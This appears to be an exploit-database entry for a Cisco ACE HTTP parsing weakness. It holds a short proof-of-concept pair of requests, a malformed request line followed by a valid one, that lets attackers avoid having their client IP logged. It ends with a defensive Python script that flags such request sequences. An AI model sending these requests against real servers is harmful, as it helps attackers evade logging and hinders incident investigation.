Cisco Application Control Engine (ACE) - HTTP Parsing Security

Author: Alexis Tremblay
type: remote
platform: hardware
date_added: 2010-05-07 
date_updated: 2014-07-04 
verified: 1 

source: https://www.securityfocus.com/bid/40002/info

Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries.

Attackers can exploit this issue to avoid having client IP addresses logged by servers.

GET / HTTP / 1 . 1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE

GET / HTTP/1.1
HOST: Myserver.com
CONNECTION: KEEP-ALIVE
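
As an added example (not part of the original advisory): a Python check a defender could run over the captured bytes of one client connection to flag a request line that does not match the HTTP/1.1 request-line grammar, such as the first request above, followed by a well-formed request on the same connection. The function names and the assumption of body-less requests are this example's own.

```python
import re

# RFC 9112 request-line grammar: method SP request-target SP HTTP-version
TOKEN = r"[!#$%&'*+\-.^_`|~0-9A-Za-z]+"
REQUEST_LINE = re.compile(rb"^(" + TOKEN.encode() + rb") (\S+) (HTTP/\d\.\d)$")

# Constructed sample: the two requests shown above on one keep-alive connection.
SAMPLE_STREAM = (
    b"GET / HTTP / 1 . 1\r\n"
    b"HOST: Myserver.com\r\n"
    b"CONNECTION: KEEP-ALIVE\r\n"
    b"\r\n"
    b"GET / HTTP/1.1\r\n"
    b"HOST: Myserver.com\r\n"
    b"CONNECTION: KEEP-ALIVE\r\n"
    b"\r\n"
)

def split_requests(stream):
    """Split a byte stream into header blocks (assumes body-less requests)."""
    normalized = stream.replace(b"\r\n", b"\n")
    return [blk for blk in normalized.split(b"\n\n") if blk.strip()]

def audit_connection(stream):
    """Return one finding per request: position, request line, conformance."""
    findings = []
    for index, block in enumerate(split_requests(stream)):
        line = block.split(b"\n", 1)[0]
        findings.append({
            "index": index,
            "request_line": line.decode("latin-1"),
            "conforming": REQUEST_LINE.match(line) is not None,
        })
    return findings

def is_suspicious(findings):
    """True when a malformed request line is followed by a valid request."""
    seen_malformed = False
    for finding in findings:
        if not finding["conforming"]:
            seen_malformed = True
        elif seen_malformed:
            return True
    return False

if __name__ == "__main__":
    results = audit_connection(SAMPLE_STREAM)
    for f in results:
        print(f["index"], repr(f["request_line"]), "ok" if f["conforming"] else "MALFORMED")
    print("suspicious connection:", is_suspicious(results))
```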